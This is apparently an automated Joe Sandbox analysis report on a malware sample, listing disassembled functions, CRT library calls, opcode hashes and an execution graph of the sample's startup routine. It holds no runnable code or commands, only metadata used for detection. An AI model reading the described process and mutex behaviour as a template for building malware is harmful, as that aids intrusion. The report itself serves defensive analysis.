                                                                                                  • Instruction ID: 758581b95a46b3ce6895d8c0cb87a876a75be6bb6a0d8a62e0114b1cb8e16811
                                                                                                  • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                  • Instruction Fuzzy Hash: 4F31B431A08250DFDB255F94FC8485977B4FB14324704B62AE9C56B2E0CBB459C9EF94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05E2FC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • std::exception::exception.LIBCMT ref: 05E2FC1F
                                                                                                    • Part of subcall function 05E1169C: std::exception::_Copy_str.LIBCMT ref: 05E116B5
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 05E2FC34
                                                                                                  • std::exception::exception.LIBCMT ref: 05E2FC4D
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 05E2FC62
                                                                                                  • std::regex_error::regex_error.LIBCPMT ref: 05E2FC74
                                                                                                    • Part of subcall function 05E2F914: std::exception::exception.LIBCMT ref: 05E2F92E
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 05E2FC82
                                                                                                  • std::exception::exception.LIBCMT ref: 05E2FC9B
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 05E2FCB0
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                                                                                                  • String ID: leM
                                                                                                  • API String ID: 3569886845-2926266777
                                                                                                  • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                  • Instruction ID: 454c4714fede138269d25820db1d0d37397ca74f0921601a3e20edf733c97c6c
                                                                                                  • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                  • Instruction Fuzzy Hash: 9D11FE79D0020DBBCF04FFA5D459CDEBB7CAA04344F40C566AD6597244EB74A348CB99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DEF010 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _free_malloc_wprintf$_sprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 3721157643-0
                                                                                                  • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                  • Instruction ID: b642e6f8a6446d392e99a3d1fdb70132359ec6d30dac76b27221a7b3a505870a
                                                                                                  • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                  • Instruction Fuzzy Hash: 021127B66005506AC66273F45C19FFF3BEC9F45311F0410AAFACCE51C0DA185A4493B1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DF1960 Relevance: 13.6, APIs: 9, Instructions: 149COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 65388428-0
                                                                                                  • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                  • Instruction ID: d523b213369d1382de1afb4d7661f845466876610e61dfb4781f1b7d0e1be91b
                                                                                                  • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                  • Instruction Fuzzy Hash: 84514A71E40219EBDB11DBE5DC89FAFBBB8FB04744F100026FA45B6180EB745A01CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DEF210 Relevance: 10.7, APIs: 7, Instructions: 165COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throw$_memset_sprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 217217746-0
                                                                                                  • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                  • Instruction ID: a07a8e7375f1c08008b9d851ff36896b16a8910c8bd463044ec8209c8e4f5c98
                                                                                                  • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                  • Instruction Fuzzy Hash: 4A5151B1E40209EADF11DFA1DC4AFEEBBB9FB04704F105026F945B6180D775AA05CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DEF440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Exception@8Throw$_memset_sprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 217217746-0
                                                                                                  • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                  • Instruction ID: 11454a73af5114d405516201c9cfc12122e084f3df07588f84b0561272ef1210
                                                                                                  • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                  • Instruction Fuzzy Hash: 4E516371E40209AADF11DFA1DC85FFFBBB8FB04744F10412AF945B6180DA74AA05CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05E2208B Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3534693527-0
                                                                                                  • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                  • Instruction ID: 12cb22df7922e0ed15aa8d009795c082cd77ac52b1e75db947d9f6000603d054
                                                                                                  • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                  • Instruction Fuzzy Hash: A6310836B043316BEB217F658C08FAE7755AF05B24F147015EB85DB2C8DB74998186A2
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05EA66D9 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • __getptd_noexit.LIBCMT ref: 05EA66DD
                                                                                                    • Part of subcall function 05E059BF: __calloc_crt.LIBCMT ref: 05E059E2
                                                                                                    • Part of subcall function 05E059BF: __initptd.LIBCMT ref: 05E05A04
                                                                                                  • __calloc_crt.LIBCMT ref: 05EA6700
                                                                                                  • __get_sys_err_msg.LIBCMT ref: 05EA671E
                                                                                                  • __invoke_watson.LIBCMT ref: 05EA673B
                                                                                                  • __get_sys_err_msg.LIBCMT ref: 05EA676D
                                                                                                  • __invoke_watson.LIBCMT ref: 05EA678B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                                                                                  • String ID:
                                                                                                  • API String ID: 4066021419-0
                                                                                                  • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                  • Instruction ID: 2f0e9b745ec88784513b565a9f7b56df4a730a563578682880bbac506c2043f4
                                                                                                  • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                  • Instruction Fuzzy Hash: 2C11C433B002146BFB227B35DD48EBA739DEF42664F042466FEC99E290E721ED4046D4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DF2670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: D
                                                                                                  • API String ID: 2102423945-2746444292
                                                                                                  • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                  • Instruction ID: 903447c62e365962114c64be5f424243c21a21d6cb7906850a4327d6e2cf3d0b
                                                                                                  • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                  • Instruction Fuzzy Hash: 81E15D75D40219EBCF24DBA0DD49FEEB7B8BF04304F14406AE609B6190EB74AA85CF54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DED8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: $$$(
                                                                                                  • API String ID: 2102423945-3551151888
                                                                                                  • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                  • Instruction ID: 536adda3835efb141411ff40181541e98132b68629be5dea671f42aa96cbae39
                                                                                                  • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                  • Instruction Fuzzy Hash: E491BF71D00218EBEF21EFA0CC59BEEBBB5AF05304F14416AD515772C0DBB65A88CB65
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05E05CE1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _wcsnlen
                                                                                                  • String ID: U
                                                                                                  • API String ID: 3628947076-3372436214
                                                                                                  • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                  • Instruction ID: 65391dee831598a6a9cfb4ee61194874d576428b9291e4020b938fb4747b8e77
                                                                                                  • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                  • Instruction Fuzzy Hash: 7021F6722082087AEB009BA49C49BBA739DEB44660F503167E989C61D0FB71ED814E94
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DFA810 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: p2Q
                                                                                                  • API String ID: 2102423945-1521255505
                                                                                                  • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                  • Instruction ID: 08b067ffaf8f842dfb2eb39190dd65c6b6be97f1aa309e85500c3bcb7a925abf
                                                                                                  • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                  • Instruction Fuzzy Hash: 61F0ED78698751A5F7217750BC2AB897E917B31B08F105088E1582E2E1D3FD238DA79A
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05E2FBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • std::exception::exception.LIBCMT ref: 05E2FBF1
                                                                                                    • Part of subcall function 05E1169C: std::exception::_Copy_str.LIBCMT ref: 05E116B5
                                                                                                  • __CxxThrowException@8.LIBCMT ref: 05E2FC06
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                                                                                                  • String ID: TeM$TeM
                                                                                                  • API String ID: 3662862379-3870166017
                                                                                                  • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                  • Instruction ID: 6c37015a6bd94fc20c2d192dd6d2c7548c98d6958e8416df91fd2f4f41ebc1c6
                                                                                                  • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                  • Instruction Fuzzy Hash: 83D06775D0020CBBCB04EFA5D459CDDBBB8AA04344B00C466AE5597245EA74A349CB99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DED0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 05E0197D: __wfsopen.LIBCMT ref: 05E01988
                                                                                                  • _fgetws.LIBCMT ref: 05DED15C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __wfsopen_fgetws
                                                                                                  • String ID:
                                                                                                  • API String ID: 853134316-0
                                                                                                  • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                  • Instruction ID: b5d300ffe4ee1e9d8c7f78ec1ae3ee1ab83168f0cfc790b9bff96a8d2c818e13
                                                                                                  • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                  • Instruction Fuzzy Hash: 8A918271D00319ABCF21FFA4CD45BAEB7F6BF04214F14052ED855A7280EB75AA44CBA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05DED540 Relevance: 6.2, APIs: 4, Instructions: 240COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _malloc$__except_handler4_fprintf
                                                                                                  • String ID:
                                                                                                  • API String ID: 1783060780-0
                                                                                                  • Opcode ID: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                  • Instruction ID: 27f813a24b3dd596555698c3446bb58e5d0b6c93ca4c831612e857206e0c52a0
                                                                                                  • Opcode Fuzzy Hash: bc6d813e7e752583a03017172366884d0a88b051dc04778f03b6bdc3bc976eb1
                                                                                                  • Instruction Fuzzy Hash: 59A18DB1D00248EBEF11EFA4CC4EBDEBBB1AF14304F141029D5457B291D7B65A88CBA6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05E02AD0 Relevance: 6.2, APIs: 4, Instructions: 163COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset$__filbuf__getptd_noexit__read_nolock
                                                                                                  • String ID:
                                                                                                  • API String ID: 2974526305-0
                                                                                                  • Opcode ID: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                  • Instruction ID: f2928f2b1461af0d35573f71a130fda99844362f15613ddcb0539e7176c3c98a
                                                                                                  • Opcode Fuzzy Hash: 7a4cfea45ad1cabaf48d6d85d658ec87b7d71ccae72904ede4351d6e655b18a3
                                                                                                  • Instruction Fuzzy Hash: F451A538A042059BEB259F69C88C5AE77E6BF40334F14B329EAB5962D0D77099D18F40
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05E21359 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                  • String ID:
                                                                                                  • API String ID: 3016257755-0
                                                                                                  • Opcode ID: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                  • Instruction ID: a0065a62e00489f1dc372492aa6632e6e00c225caede3f3c6eda3b7e3c8223b2
                                                                                                  • Opcode Fuzzy Hash: e393168896588b0b80739e59f19fb333f0c598a6fe77797445646574719babf5
                                                                                                  • Instruction Fuzzy Hash: 68017B3280415EFBCF1A5F84CC05CEE3F63BB18244B0A9414FA9958838D232C6B2EB81
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 05EA7A34 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ___BuildCatchObject.LIBCMT ref: 05EA7A4B
                                                                                                    • Part of subcall function 05EA8140: ___BuildCatchObjectHelper.LIBCMT ref: 05EA8172
                                                                                                    • Part of subcall function 05EA8140: ___AdjustPointer.LIBCMT ref: 05EA8189
                                                                                                  • _UnwindNestedFrames.LIBCMT ref: 05EA7A62
                                                                                                  • ___FrameUnwindToState.LIBCMT ref: 05EA7A74
                                                                                                  • CallCatchBlock.LIBCMT ref: 05EA7A98
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.2012565443.0000000005DE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05DE0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_5de0000_mU2p71KMss.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Catch$BuildObjectUnwind$AdjustBlockCallFrameFramesHelperNestedPointerState
                                                                                                  • String ID:
                                                                                                  • API String ID: 2901542994-0
                                                                                                  • Opcode ID: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                  • Instruction ID: a758289b5e2beaf28ff1a68e78f031145c8190463bc1db556c3af24cfbe33e02
                                                                                                  • Opcode Fuzzy Hash: dd3ac78af2fd1184da527a8de72168518a9c3bdc752cc05c4f080d411e07ec88
                                                                                                  • Instruction Fuzzy Hash: 5601D733500109BBDF12AF65CC04EDA7BAAFF49758F159014F99969120D732E961DBA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:0.8%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:492
                                                                                                  Total number of Limit Nodes:36
                                                                                                  execution_graph 43981 423f84 43982 423f90 _flsall 43981->43982 44018 432603 GetStartupInfoW 43982->44018 43985 423f95 44020 4278d5 GetProcessHeap 43985->44020 43986 423fed 43987 423ff8 43986->43987 44347 42411a 58 API calls 3 library calls 43986->44347 44021 425141 43987->44021 43990 423ffe 43991 424009 __RTC_Initialize 43990->43991 44348 42411a 58 API calls 3 library calls 43990->44348 44042 428754 43991->44042 43994 424018 43995 424024 GetCommandLineW 43994->43995 44349 42411a 58 API calls 3 library calls 43994->44349 44061 43235f GetEnvironmentStringsW 43995->44061 43998 424023 43998->43995 44001 42403e 44002 424049 44001->44002 44350 427c2e 58 API calls 3 library calls 44001->44350 44071 4321a1 44002->44071 44006 42405a 44085 427c68 44006->44085 44009 424062 44010 42406d __wwincmdln 44009->44010 44352 427c2e 58 API calls 3 library calls 44009->44352 44091 419f90 44010->44091 44013 424081 44014 424090 44013->44014 44344 427f3d 44013->44344 44353 427c59 58 API calls _doexit 44014->44353 44017 424095 _flsall 44019 432619 44018->44019 44019->43985 44020->43986 44354 427d6c 36 API calls 2 library calls 44021->44354 44023 425146 44355 428c48 InitializeCriticalSectionAndSpinCount __ioinit 44023->44355 44025 42514b 44026 42514f 44025->44026 44357 4324f7 TlsAlloc 44025->44357 44356 4251b7 61 API calls 2 library calls 44026->44356 44029 425154 44029->43990 44030 425161 44030->44026 44031 42516c 44030->44031 44358 428c96 44031->44358 44034 4251ae 44366 4251b7 61 API calls 2 library calls 44034->44366 44037 42518d 44037->44034 44039 425193 44037->44039 44038 4251b3 44038->43990 44365 42508e 58 API calls 4 library calls 44039->44365 44041 42519b GetCurrentThreadId 44041->43990 44043 428760 _flsall 44042->44043 44378 428af7 44043->44378 44045 428767 44046 428c96 __calloc_crt 58 API calls 44045->44046 44047 428778 44046->44047 44048 4287e3 GetStartupInfoW 44047->44048 44050 428783 _flsall @_EH4_CallFilterFunc@8 44047->44050 44049 428927 44048->44049 44056 4287f8 44048->44056 44051 4289ef 44049->44051 44054 428974 GetStdHandle 44049->44054 44055 428987 GetFileType 44049->44055 44386 43263e InitializeCriticalSectionAndSpinCount 44049->44386 44050->43994 44387 4289ff LeaveCriticalSection _doexit 44051->44387 44053 428c96 __calloc_crt 58 API calls 44053->44056 44054->44049 44055->44049 44056->44049 44056->44053 44058 428846 44056->44058 44057 42887a GetFileType 44057->44058 44058->44049 44058->44057 44385 43263e InitializeCriticalSectionAndSpinCount 44058->44385 44062 432370 44061->44062 44063 424034 44061->44063 44390 428cde 58 API calls 2 library calls 44062->44390 44067 431f64 GetModuleFileNameW 44063->44067 44065 4323ac FreeEnvironmentStringsW 44065->44063 44066 432396 ___check_float_string 44066->44065 44068 431f98 _wparse_cmdline 44067->44068 44070 431fd8 _wparse_cmdline 44068->44070 44391 428cde 58 API calls 2 library calls 44068->44391 44070->44001 44072 42404f 44071->44072 44073 4321ba __wsetlocale_nolock 44071->44073 44072->44006 44351 427c2e 58 API calls 3 library calls 44072->44351 44074 428c96 __calloc_crt 58 API calls 44073->44074 44081 4321e3 __wsetlocale_nolock 44074->44081 44075 43223a 44393 420bed 44075->44393 44077 428c96 __calloc_crt 58 API calls 44077->44081 44078 43225f 44079 420bed _free 58 API calls 44078->44079 44079->44072 44081->44072 44081->44075 44081->44077 44081->44078 44082 432276 44081->44082 44392 42962f 58 API calls __close 44081->44392 44399 4242fd 8 API calls 2 library calls 44082->44399 44084 432282 44087 427c74 __IsNonwritableInCurrentImage 44085->44087 44401 43aeb5 44087->44401 44088 427c92 __initterm_e 44090 427cb1 _doexit __IsNonwritableInCurrentImage 44088->44090 44404 4219ac 67 API calls __cinit 44088->44404 44090->44009 44092 419fa0 __ftell_nolock 44091->44092 44405 40cf10 44092->44405 44094 419fb0 44095 419fc4 GetCurrentProcess GetLastError SetPriorityClass 44094->44095 44096 419fb4 44094->44096 44098 419fe4 GetLastError 44095->44098 44099 419fe6 44095->44099 44458 4124e0 109 API calls _memset 44096->44458 44098->44099 44419 41d3c0 44099->44419 44100 419fb9 44100->44013 44103 41a022 44422 41d340 44103->44422 44104 41b669 44554 44f23e 59 API calls 2 library calls 44104->44554 44106 41b673 44555 44f23e 59 API calls 2 library calls 44106->44555 44111 41a065 44427 413a90 44111->44427 44115 41a159 GetCommandLineW CommandLineToArgvW lstrcpyW 44117 41a33d GlobalFree 44115->44117 44131 41a196 44115->44131 44116 41a100 44116->44115 44118 41a354 44117->44118 44119 41a45c 44117->44119 44443 412220 44118->44443 44121 412220 76 API calls 44119->44121 44122 41a359 44121->44122 44124 41a466 44122->44124 44462 40ef50 58 API calls 2 library calls 44122->44462 44123 41a1cc lstrcmpW lstrcmpW 44123->44131 44124->44013 44126 41a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 44126->44131 44127 420235 60 API calls ___get_qualified_locale 44127->44131 44128 41a48f 44130 41a4ef 44128->44130 44463 413ea0 59 API calls ___check_float_string 44128->44463 44464 411cd0 92 API calls 2 library calls 44130->44464 44131->44117 44131->44123 44131->44126 44131->44127 44133 41a361 44131->44133 44459 423c92 59 API calls __woutput_p_l 44133->44459 44134 41a563 44168 41a5db 44134->44168 44465 414690 59 API calls ___check_float_string 44134->44465 44136 41a36e lstrcpyW lstrcpyW 44137 41a395 OpenProcess 44136->44137 44138 41a402 44137->44138 44139 41a3a9 WaitForSingleObject CloseHandle 44137->44139 44461 411cd0 92 API calls 2 library calls 44138->44461 44139->44138 44142 41a3cb 44139->44142 44140 41a6f9 44468 411a10 8 API calls 44140->44468 44158 41a3e2 GlobalFree 44142->44158 44159 41a3d4 Sleep 44142->44159 44460 411ab0 PeekMessageW DispatchMessageW PeekMessageW 44142->44460 44143 41a6fe 44147 41a8b6 CreateMutexA 44143->44147 44148 41a70f 44143->44148 44144 41a5a9 44466 414690 59 API calls ___check_float_string 44144->44466 44153 41a8ca 44147->44153 44152 41a7d0 44148->44152 44469 40ef50 58 API calls 2 library calls 44148->44469 44151 41a40b GetCurrentProcess GetExitCodeProcess 